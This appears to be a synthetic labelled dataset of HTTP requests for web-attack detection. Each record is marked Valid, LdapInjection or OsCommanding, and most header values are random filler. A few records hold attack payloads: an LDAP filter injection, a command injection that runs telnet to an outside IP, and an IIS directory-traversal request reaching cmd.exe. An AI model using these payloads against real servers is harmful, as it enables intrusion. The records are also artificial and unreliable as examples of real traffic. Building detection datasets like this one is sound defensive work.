Pragma: S=olequu
Proxy-Authorization: Basic b2lpYWE6ZTE5dW1lZQ==
Authorization: Digest qop=auth
Range: 7717-
Referer: /xipOnpn/d3ar/c3essg9n/8ysNiWhx/EmfuNlon.sh
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/6.6 (Windows; U; Win98 2.6; rt-6s; rv:6.7.7) Gecko/08181842
UA-CPU: 68000
UA-Disp: 6627,5776,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 629x010
Via: 7.6 33.12.143.98, hfcs/8.3 241.219.236.64
Transfer-Encoding: gzip
Upgrade: qtiUn/4.0, erx/6.5, 6el/5.2, CbtgHd/4.1, eolItq/5.0
Warning: 676 www.hooAenjp.htm:218 "aqnEtosob2" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

noloN=;Vrhttps|my  SwOevalftpco0yY2&2totaah4jju=eOwwautc9rene8mmRE

End - Id: 7231
Start - Id: 23227
class: Valid
GET /2execPoAEadmin4SnJOh-G/0R/eae/OL9oIwhereGmuVKC/dwhudeoaa/m5k.mspx?tofahc6belo=lat3ec+%3A+rsu%25u2erunion&f46d6gR=hunuuylcoiard&DromeabLshs=likecch&EskTdAt=al&oothd=rN_xD4%40G.YsC&utotw=35&sildmfmf=Ib%5Cmr&nEwpfu4=sbnah&anIfltmk=ird0nS&xnieeufwormp=tO3vjoroPoe HTTP/1.0
Host: www.5A6Di87.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=16938
Client-ip: 200.237.5.232
Cookie: s5xt7n=]Ze
Cookie2: $Version="4"
Date: Sat, 18 Sep 04 07:53:22 UTC
ETag: "5MAajd4GdkXH0aF-haq"
Expect: 100-continue
From: Rjxwaog1@ureg.de
If-Modified-Since: Sat, 24 Jan 09 15:10:12 CET
If-Unmodified-Since: Tue, 08 Nov 05 15:14:11 UTC
If-Match: *
If-None-Match: "Jh8dxAz.mmaHTzX_Ng"
If-Range: *
Max-Forwards: 013
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM aGllZGFvd2FuYTRvbGxvYklhZFhpN2VhY2hybHRUc25sN295cnlsaWVza283
Range: 209-,55-
Referer: http://tttda.uk/eRqT.shtml
TE: deflate
Trailer: Via
User-Agent: Mozilla/2.6 (X11; U; Solaris 8.1; n6-22; rv:3.1.2) Gecko/25775348
UA-CPU: StrongARM
UA-Disp: 070,0093,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 973x7584
Via: HTTP/8.1 www.vrs9tNpl.tiff:2, sEs/5.9 193.236.23.253:4, uehuji/8.1 36.180.190.148
Transfer-Encoding: identity
Upgrade: ti3fo/5.3
Warning: 662 228.167.11.242 "o9Tsgh2g1salVsi4" "Sun, 23 Oct 05 19:27:40 CET"
X-Forwarded-For: 231.110.49.145
X-Serial-Number: 9726059
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23227
Start - Id: 34197
class: Valid
POST /r3nzlsiaesauehRci/aZNt5wbugNxeSH/tufacT/qt3shOhvlIodom/OatzLT1HV/lA6KEdropaccess_logI5/ritla/yiEthtseBgitoo6is8/e.ZA4kP8qK1MpB9xU/Wd.uxhWaRBB.asmx? HTTP/1.1
Content-Length: 267
Content-Language: et,n
Content-Encoding: gzip
Content-Location: /8yrsjt/7dleped/nleudler/hIbaa/1acs.jpeg
Content-MD5: dGJlQm50cmZub2FlbjFldg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Jun 06 23:49:53 GMT
Last-Modified: Tue, 08 Aug 06 21:34:01 GMT
Host: www.U7eJm1.cz:90496
Connection: close
Accept: application/postscript
Accept-Charset: x-mac-roman;q=0.8, euc-tw;q=0.4, windows-1254, x-mac-icelandic, iso-8859-3;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=17
Client-ip: 195.30.83.12
Cookie: nWr=73221;ElikeinsertiK=eqzTiltpmobject@iteyeh d;Aoijtzasj7Iedem=mk7@3c;nmttuLesicm=3Dftpn);zY=n_3HXuQ9UDE;1l=-;xmupdateia7c0
Cookie2: $Version="0"
Date: Tue, 16 Sep 08 24:14:41 UTC
ETag: "ehlGSz.VF..ZXY@"
Expect: btdIas
From: llrradu@4vhsetp.com
If-Modified-Since: Sat, 19 May 07 23:08:56 UTC
If-Unmodified-Since: Mon, 25 Oct 04 12:12:43 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 23 May 09 23:33:14 UTC
Max-Forwards: 813
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic dE9vcWE2cEE6ZzFpNUU=
Authorization: Digest nc=Ce099BCf
Range: 40581-
Referer: /akYtfi/mEe1ewo/momOtn.jsp
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (Machintosh; U; PPC Mac OS X 5.9; ur-tu; rv:2.6.8) Gecko/67798684
UA-CPU: x86
UA-Disp: 5943,076,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 306x913
Via: at8m/0.0 46.25.49.104, 5.4 www.irga.shtml:75429
Transfer-Encoding: etede; hlihjte=dnoite
Upgrade: l4mic/8.6
Warning: 026 135.184.49.190 "ktxttss0" 
X-Forwarded-For: 39.178.242.76
X-Serial-Number: 7747668675736673
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hoinite5m3n=iPIIwb7N&iqrnai=cat)o&seiqeorrie6=4333619&85tzee=xmlilutewaki2z&s3aqmtskt=rchlmtaaons&ttrrtd8enU=ecSB9&IinmeasE=7Uv1k7ZJ7&ccoaqg0ohahet= rm&eneSeero=ietc4&connect.e4S_=YncRnnie3crEnr&rTwrc1uOe4tftor=desi4&j4chlm=onWip&Ty8hra7Ocehtc=thytlmucko&jiXz6o=535

End - Id: 34197
Start - Id: 26713
class: Valid
GET /ovugBR2/ZdsudcddethByntdeiz/pp_p9wIsaG3Lf7k/aQolgStour/hf@LU5/iU5WvguKyF@S@tJ3hKOY/oCJUWrM/tehgTlcom3aevr/ddtmraiosnponnlhf97.js? HTTP/1.1
Host: 41.65.5.52:3873
Connection: keep-alive
Accept: application/rtf, application/*;q=0.1, audio/*
Accept-Charset: utf-7, us-ascii;q=0.9, koi8
Accept-Encoding: identity, identity
Accept-Language: etaL-o, ee-elOaiho;q=0.0, oynHatH-lze1r;q=0.5, t8igc-2drct;q=0.1, see-eyone9oi;q=0.9
Cache-Control: max-stale
Client-ip: 41.69.153.49
Cookie: mgm=omt2s;1goptMdORiQM=7o;9yoyyvtllTeTet=4564;9eEosystsnnfnhn=2;O9pmdRnha=8410
Cookie2: $Version="091"
Date: Mon, 26 Nov 07 02:26:13 GMT
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: LhagleWG@oti0.gov
If-Modified-Since: Fri, 16 Feb 07 14:24:48 CET
If-Unmodified-Since: Sun, 10 Dec 06 21:30:07 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Xtgt8g gueh9=jopucso
Authorization: no8C rnso=aAnop
Range: 704-,903943-39311
Referer: /Lehi/Uti7eg/ntlne68/Ao15nNhh/stis.tiff
TE: deflate;q=0.5,gzip;q=0.1,trailers
Trailer: User-Agent
User-Agent: i6dDIuA http://www.etir4fgn.be
UA-CPU: StrongARM
UA-Disp: 221,658,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 873x2179
Via: 6.2 32.199.129.169, psvsa/4.7 164.86.69.191
Transfer-Encoding: ya58s
Upgrade: iagr/3.7
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 241.3.2.199
X-Serial-Number: 838236
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26713
Start - Id: 17922
class: Valid
GET /adEI6yk/UeqeVeeehyErlu/fnJVbin0@/i-/szeaasce/S9E2TaJofadminnawgetk/vo_cVIVH3/lkL8o_V.jpg?nd=wT&njnten=vzbee&bits=2sQ6&3jep=qiy5HEzent%3Cehteeto9n&5sM6BiZ.xJBn=954 HTTP/1.0
Host: www.ngooS.de:121
Connection: hpetrfk
Accept: */*
Accept-Charset: euc-tw, iso-8859-15, x-mac-arabic;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: max-stale=1
Client-ip: 200.145.185.234
Cookie: tomsvddt4n=27
Cookie2: $Version="10"
Date: Sun, 26 Jul 09 05:30:47 CET
ETag: ".p8wkIhD7TbAXtCk@"
Expect: 100-continue
From: 5eetcI@n8lRomisoe.st
If-Modified-Since: Thu, 07 Oct 04 02:49:18 CET
If-Unmodified-Since: Tue, 23 Jan 07 11:26:21 GMT
If-Match: *
If-None-Match: "f@aj7Ci63WKpKW7EFv35"
If-Range: *
Max-Forwards: 87
MIME-Version: 9.1
Pragma: mheii5z=ohheyne
Proxy-Authorization: Basic cXluY1NlYzpic3p0dTdt
Authorization: NTLM Y2gxYXJlc3pvbGlqb3dodzlmZXRubXNsYWVmbmlhYjJzaA==
Range: 05-,-776516,-07
Referer: /yt2ees/atqsn/p9aete/hsdOh4Yi.txt
TE: chunked,trailers,trailers
Trailer: Max-Forwards
User-Agent: s@ywVpI1KQ http://www.lstl.ch
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: HTTP/2.6 38.13.163.96:3
Transfer-Encoding: compress
Upgrade: e7uehc/9.0, le2xw/9.8, miatr/5.7
Warning: 671 106.176.10.108 "pkuHamDeoEeSedete" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 8381908250645
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17922
Start - Id: 34212
class: Valid
PUT /q0FTufdXqR/tGehFIi3s.9uXFN7sI/nLP/mJGM/7ui1r/0FigNLC3/iRVPy/XQwhere3sWlinkKyr-/a5eXrlznchdeehOs/f.j9gincludeKjselect3@.R.mspx? HTTP/1.1
Content-Length: 332
Content-Language: larl
Content-Encoding: compress
Content-Location: /gIwy.msf
Content-MD5: amx5dXM5bzRsc2lidXR0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Aug 05 20:31:04 UTC
Last-Modified: Fri, 26 Aug 05 08:14:23 CET
Host: 120.103.175.251
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-874, iso-8859-15, iso-2022-jp, x-mac-turkish;q=0.2
Accept-Encoding: *
Accept-Language: otnsm-v8;q=0.6, OamjFaoE-aadoj, kegiTeYn-bitewv, w3gqbck-a;q=0.9, h1s5eHs-4droi
Cache-Control: max-age=2
Client-ip: 76.113.209.101
Cookie: slwq=389883451;vsolamahE=464261;ozmoelAoRurFl=oF1lM0_;hvm8bidd029=l5tpttaoeejrbrtlqn;HQRP_yk=forma
Cookie2: $Version="29"
Date: Thu, 03 Feb 05 17:33:00 CET
ETag: "Gg1B1yaE-jhaS2.AN"
Expect: 100-continue
From: tmwyT@acvot.it
If-Modified-Since: Wed, 19 Dec 07 14:44:55 CET
If-Unmodified-Since: Mon, 17 Dec 07 09:12:24 CET
If-Match: *
If-None-Match: "5UdmujvhCVTvGu5MqP"
If-Range: Wed, 15 Mar 06 07:33:39 GMT
Max-Forwards: 4714
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest qop=tetfk
Range: -4
Referer: /eaht/6ninaOc.cfm
TE: deflate;q=0.0,gzip;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: cNzI-B5O http://www.sdtr5e.fr
UA-CPU: x86
UA-Disp: 0359,9461,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 306x913
Via: dysNa/3.3 12.111.166.179, 9.7 213.10.30.241
Transfer-Encoding: compress
Upgrade: ey6gg/6.4, mid/9.0, tq0u/3.6, tt7tio/5.3, foheo/4.7
Warning: 362 134.85.191.186 "tsdieztetsthntthlbia" "Sun, 24 Dec 06 07:54:11 UTC"
X-Forwarded-For: 81.117.172.20
X-Serial-Number: 7747668675736673
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1lEm=DenN1t2hlrrobr4i&MdeletezqMYNL=3wgetet&stiysp3er1m64t=amEdidTbafea2&tugEao2=]etiglmebt|wiw&rsd=704185857&etmneoszye=iiw&sP5D_W=neqdozasa&-GDJip=4UF@&4jv5Q7G=eIc2guek@q&b7ulett=89062131&oiotodxt=b(rvbscriptht6seGy&a4ds2iba=@trbua   lstyleq iAT;&U8fRBwinntPE=Wxnraqeadocgrrtcn&Endr=ossderomeyfeeal&fiaabepei=8022108

End - Id: 34212
Start - Id: 37940
class: LdapInjection
GET /tX9NZ1Dy1y_/hQItVzp3PCEzNG83EG/gnorOm/mhWD2@TZj8n.gif?M@Cpc7nyO=rk1d0&9mrs=t4dns8tnhmItnenpp&gotaq7reh6cybnu=nyvor&ni=mochaogspnnai%5C&eSU=%29+%28+++%7C+%28displayName%3Dhad*%29%28name%3D+++had*+%29%28++mail%3Dhad*%29&euen7=0YItWw&sw0tr3tCoaTwj4=dtZY7j2c&.@k3style=a4lo HTTP/1.1
Host: www.snrb.de:4192
Connection: yoei
Accept: audio/*, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: k-hsnc, cAntj-eac, zv-oasA;q=0.2, dpetTld-eo, 3ali-ssrEhnep;q=0.5
Cache-Control: no-cache
Client-ip: 199.14.205.63
Cookie: 3taA0gvei1=5089035;cXaaminoemluOh=5dMeWv;o9odtpheihtAeru=8421683514
Cookie2: $Version="744"
Date: Sat, 13 Mar 10 17:49:51 GMT
ETag: "@hEnk31e1wcVVUPZmXzn"
Expect: lue5olis
From: iduony@u6ee.be
If-Modified-Since: Sun, 23 Sep 07 04:56:53 CET
If-Unmodified-Since: Fri, 18 Feb 05 19:34:58 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 465
MIME-Version: 8.6
Pragma: wnlmrz=At0tpy
Proxy-Authorization: Digest cnonce="aEoaal"
Authorization: NTLM YXRkdWlyczlldWRraG9kbWVqblJvYWFtNTBheGFlaWl6UW5QYW9samJz
Range: -05,-121
Referer: /eiTGto/eyisT/ehe1rc.cfm
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: tMzqFwvWNU http://www.aost.gov
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8982x115
Via: HTTP/7.4 www.enhv.png, 6.4 166.106.57.251, HTTP/3.9 194.134.150.253
Transfer-Encoding: identity
Upgrade: vtsi/8.4, niogL/5.5, sra/2.0
Warning: 842 www.ions.htm "attse" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37940
Start - Id: 30317
class: Valid
GET /Oa/o4rneagsivu/se0mrhrsae/r9/uq@moI6k1zB/xBsDvXTNfSv.sSbOE5R/hwaotyhaeop9sn/nxt0nM39ldkd2fiwkE6.swf? HTTP/1.0
Host: www.hhtseocvet.ch
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ia7aZ-trsha;q=0.6, zi-eaal;q=0.1, onfnhlsw-omt;q=0.7, tcnlmcxD-e, w-aowsolGv;q=0.4
Cache-Control: max-stale=14539
Client-ip: 125.3.188.70
Cookie: d81eqatnA=swutGea0owd3pww;ublhv=cesfuti;t9adaa=54940915;1ltulrdi1a=7741356
Cookie2: $Version="1"
Date: Thu, 22 Feb 07 10:56:17 UTC
ETag: W/"xliPt_ly5_0Z-ER.-rRb"
Expect: 100-continue
From: eredri@rnloehihom.net
If-Modified-Since: Fri, 12 Mar 10 15:11:07 GMT
If-Unmodified-Since: Thu, 22 Jul 04 16:38:22 CET
If-Match: "jZMl0WVIrNfhIRQN"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZXJ0SWN5YjU6aFRuNHRu
Authorization: ad3pcf ehoi=8oeos
Range: 54-167889
Referer: /DenEoisv/xnsay/kt3taRi/41n4ane.js
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 1.5; id-xl; rv:6.8.1) Gecko/34563982
UA-CPU: 68000
UA-Disp: 9919,2865,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3971x442
Via: xkd/2.8 195.189.211.95, FTP/2.7 201.213.227.255:45600, 5.4 www.ioarsimr.shtml
Transfer-Encoding: netl
Upgrade: hztley/9.7, peaeM/3.4, iwtar/8.7, 1Tzzin/0.9, roh/9.3
Warning: 232 99.201.159.8 "oAqfnetTzahmyttdf" "Fri, 04 Jul 08 05:10:09 UTC"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30317
Start - Id: 30768
class: Valid
GET /i9h3ub@mUek@XkeT/htwjxwVpTrbtfnetrdg/zemcotttour.mdb?aMpsdcrt=611910&tntn=djD&Srenieiwdteany=wh9suhlM%5D8Tow&tctC=9Nkcw5mR%28i%3Eemieurcnu&leee=0962200301&snsxHvaSo9t=RunimptrnRrtedf&r_8bl_E=sNsl4ahao&gI7iorvXF@Y=eg&eHgttca1eor=0456741&0andUyi0Db=r%5Cph&iitmm2yr=9EXGTMKP&dri9=30413&ekc6sn=qas0I1aenRbhI9n HTTP/1.1
Host: 191.76.35.242
Connection: close
Accept: text/plain;q=0.4, audio/*;q=0.3, image/jpeg
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: no6-dmmg, hn-Htsets;q=0.4, mSes-ehemiIt
Cache-Control: no-transform
Client-ip: 248.117.28.208
Cookie: ratpfya6gg=aCntoim<oe70bzaqfe;eoHe1mchpS=7914;ojtfzq1s=3619031277;iroaterGlcSD=evari&tAuoexecc
Cookie2: $Version="87"
Date: Wed, 07 Feb 07 22:04:21 CET
ETag: "XDy91SYraxCKr0x"
Expect: dhOtrocf=8trheo;f7rimsn
From: dzpsof6@gehphe0eb.biz
If-Modified-Since: Thu, 10 Sep 09 11:38:53 GMT
If-Unmodified-Since: Tue, 31 Aug 04 04:48:11 UTC
If-Match: *
If-None-Match: "4Ngv3vpacdnDbDljZlm"
If-Range: "EZDHpA9FjYuNb3GGH"
Max-Forwards: 183
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ieatc4 rnrbw=hcadA
Authorization: Basic dHBybzNvbmQ6ZXNud2c=
Range: 145-,977-10
Referer: /audm.nsf
TE: trailers
Trailer: TE
User-Agent: Mozilla/8.6 (X11; U; Open BSD i586 5.4; Le-hn; rv:3.9.6) Gecko/28610100
UA-CPU: 68000
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: 3.6 www.axoa.jpeg, 1.6 95.41.255.219, 3.8 212.174.189.77
Transfer-Encoding: weNi
Upgrade: cuy/5.8, hrhe/5.4, pyae/0.7, qnece/8.2
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 93006994743675
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30768
Start - Id: 43170
class: OsCommanding
GET /tmpmcpC3F/1aOSrtCzt2g42KDwm0/cA/552where-iTprocessing-instructioneY-/sAzzyiigo/baco/fZHOi-2Slx.6kG.msf?eezahr=5&yaHnneorlllya=%22++%3B+telnet++++132.32.215.133++80%3B&hrPtu5meyke=aTmdzg&ojriHqaetf=hot%29x&t15noep=tf0pat%3A%25nh&tttct=eupitd3t%7E&cmdvEx3cmd=sde0lt1gu&emdaeahe=7&bltacd=52&ak=cmdspasswdbdcteuds&brRiaTotcYi05t=obrrr2ls&eyrtmsr=tT7tTsktutnenwlc HTTP/1.1
Host: 247.146.176.146:43382
Connection: niox
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 229.240.5.133
Cookie: avcthwztsEmtNe=mlga3k<s hc[ rCvbscript\olink;xDjaccess_log39-g=S7vtrd;lxIdrou98biah8g=391;jeh=nCOnnc6bdhntwa;awe=885561;ans=sla7mcqps2mn
Cookie2: $Version="045"
Date: Mon, 01 Jan 07 08:46:05 GMT
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: spog@iutmqee.net
If-Modified-Since: Mon, 17 Jul 06 04:42:59 GMT
If-Unmodified-Since: Wed, 28 Jan 09 04:43:24 GMT
If-Match: "bphVQyJDe@l@tGwwww8z"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: Mon, 03 Jul 06 22:31:31 GMT
Max-Forwards: 41
MIME-Version: 2.9
Pragma: sSIuriea=sdNhel
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: Digest nc=Bef4e5bA
Range: 332370-1588,656-95
Referer: http://2iSbuy.ch/ldrEte/fejthlt.php
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/5.0 (compatible; Konqueror/1.8; SunOS sun4u; seeate1ia)
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 7.1 www.ssttlemo.jpeg
Transfer-Encoding: qrcQeh
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43170
Start - Id: 24094
class: Valid
GET /nXLSN585/rYgwvT/tpIB5xhHs/aFand@PbV3zhtpassF_2/e6ZN0BVYiW/OtieSg4aih/hOa/Hain3sobhcnigtamT7a/uRdNEcSKiaoGnET8r0aT/2rlsKeasystem1/ebeluiaaal8BKolO/itmpmbwgetOUD.sh?ar2azeDov=nICYIvEhC3p&Rin=16&TIzL=56233551&xran7=+&UsNkSiNEIjAiim=t%25ekf5%3Fnua&OWUrxIl2guTz=gcAjoi8VHO&ulibpg7__Hi-=xp_Ifmuhldmrma3&oHguaerpi=Og&ttnsjl=345255&swfa0zsde5diooi=36847 HTTP/1.1
Host: 174.223.85.170
Connection: ndta8ba
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 184.105.104.188
Cookie: Ruo=tveurrlCetl0tbd8;trimdr9jneeaens=wo7w4Mzp;RbkbLSw=eCLuqYKiOGk;atrator1g=tdCdHYsz;irusrsA=l3uA8qe0AyPups1m;onateeAacds=Wea
Cookie2: $Version="9"
Date: Fri, 16 Nov 07 23:47:36 CET
ETag: W/"RwJz-c4M0e2bHfKhkNp3"
Expect: 100-continue
From: idehs@lb6ztam.biz
If-Modified-Since: Sat, 18 Dec 04 20:01:30 UTC
If-Unmodified-Since: Thu, 04 Jan 07 24:34:09 CET
If-Match: "hA0Z5B5PBUOiVIFcPq"
If-None-Match: "a_@OJqy9iuQ1gza0NTum"
If-Range: Mon, 20 Dec 04 14:47:34 CET
Max-Forwards: 917
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM YWVnaXR1bmVodWFvZWFVTUVpbHJocmw4ZWNzbHMyZHRkbnNyZnhz
Authorization: Digest algorithm=MD5
Range: 8656-,477-859015,5910-
Referer: /4ySombu/osdeeao/dpea6e/4bes/mNhib2.jsp
TE: gzip;q=0.3,chunked;q=0.8,trailers
Trailer: Range
User-Agent: maFetmx9 (2PsJOQVaZ; gCiFVda; e@IjHG; 0T73.piqLz)
UA-CPU: 68000
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 390x221
Via: 8.1 253.27.143.212
Transfer-Encoding: compress
Upgrade: orayl/3.8, rnnt/3.2, ise/8.1
Warning: 178 126.189.30.55 "LptaNsntoaeessie6" "Sun, 23 Jul 06 12:48:27 CET"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 740529934868246
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24094
Start - Id: 44442
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 79.143.62.84:7087
Connection: keep-alive
Accept: audio/*, audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: compress, identity;q=0.0
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 173.115.52.160
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Fri, 22 Jan 10 10:43:48 GMT
ETag: W/"FP76Uf4Vrb4BtBS"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Mon, 22 Mar 04 16:14:03 UTC
If-Unmodified-Since: Tue, 27 Nov 07 24:33:56 CET
If-Match: *
If-None-Match: "@p.dZyTKrVRi7HBOlW3"
If-Range: Mon, 08 Nov 04 08:50:39 UTC
Max-Forwards: 9482
MIME-Version: 6.3
Pragma: otni=YHC1hA
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: AenLO msnxrte=itaSthg
Range: 6-02287,72753-
Referer: /Rursis/gqtdttlm/eCs2/seasjran.cfm
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/2.9 (Windows; U; Win98 6.1; Yt-eo; rv:0.9.1) Gecko/47854049
UA-CPU: Sparc
UA-Disp: 023,120,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: FTP/0.0 183.56.230.149
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 167.120.10.31
X-Serial-Number: 45781122630812126119
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44442
Start - Id: 24606
class: Valid
GET /edsh0eng/uJl5XoHVUtECoR/iQ0.D/p-p2DFbyq0uiOOY8mL.html? HTTP/1.1
Host: www.Th9l.gov
Connection: aaass
Accept: */*
Accept-Charset: windows-874;q=0.6, iso-8859-8-i, x-mac-japanese;q=0.1, x-mac-arabic, x-mac-chinesetrad;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: 3tqbTepi='fsceUzsn'
Client-ip: 144.153.248.99
Cookie: 2i8zwget@u_=32469374;meR2untedtssc=7841
Cookie2: $Version="24"
Date: Fri, 20 Jun 08 22:30:06 UTC
ETag: W/"pNl764YjtFInVklT"
Expect: 100-continue
From: naao@dsGtaOrc0.net
If-Modified-Since: Sat, 05 Jul 08 11:05:37 GMT
If-Unmodified-Since: Mon, 06 Apr 09 09:45:00 GMT
If-Match: "m-z4I@UIBdRpxQhARc"
If-None-Match: "MN6Z1kcVdo4O2KoRV3Vz"
If-Range: "gKbP0rKA0BKqSjVZ2YIi"
Max-Forwards: 7697
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: R9lOil aedc=l6achff
Authorization: Aenm dlou=deTnpsad
Range: -633614,846-,145-
Referer: /jgtttea/tvmhc.msf
TE: trailers
Trailer: Host
User-Agent: dXDrp4 http://www.tekv12yu.biz
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4948x889
Via: 3.6 www.stxnne.png, reei/2.2 98.221.251.64, 8.5 www.ndjl.js
Transfer-Encoding: identity
Upgrade: lha/0.0, onynn/5.1, e0f2s5/9.2, leAc/8.0
Warning: 725 www.hdse.js "umrhh5ybso" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 04810456
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24606
Start - Id: 13371
class: Valid
GET /@5@dZvb5nwp-XmOX./q5aFmHn/PgBx0wseo/ndrNH_iZ9K3Lwluen/-Z.hwW/ea3fZJJPLMI.s/oMoGxr.jzTuhEjCEwfN./mQ0H6PKFKxhd.js? HTTP/1.0
Host: www.xrSqos.net
Connection: tefsrpe
Accept: application/x-tar;q=0.0, audio/x-wav
Accept-Charset: windows-1255, shift_jis
Accept-Encoding: 
Accept-Language: eEssihO-ryneolis;q=0.7, sslOs-a;q=0.9
Cache-Control: no-transform
Client-ip: 88.65.120.166
Cookie: 4catBJV8A-=8589738;bun1tesDTy=nz@dP0Yit;se4o4j=cctowqwindow.openi;lo=deaigi;pes=3522
Cookie2: $Version="97"
Date: Mon, 23 Jun 08 13:39:07 GMT
ETag: W/"S7OycLOuM3B-ZwP0fm"
Expect: Jedxet=msTarIpr
From: 4butpT@e0niqeT8.uk
If-Modified-Since: Mon, 10 Oct 05 19:16:45 CET
If-Unmodified-Since: Sat, 03 Apr 04 10:42:35 GMT
If-Match: *
If-None-Match: "@QQeJv5_BQ_FMrAeDJo4"
If-Range: *
Max-Forwards: 6
MIME-Version: 5.1
Pragma: nSeho02h=sEn
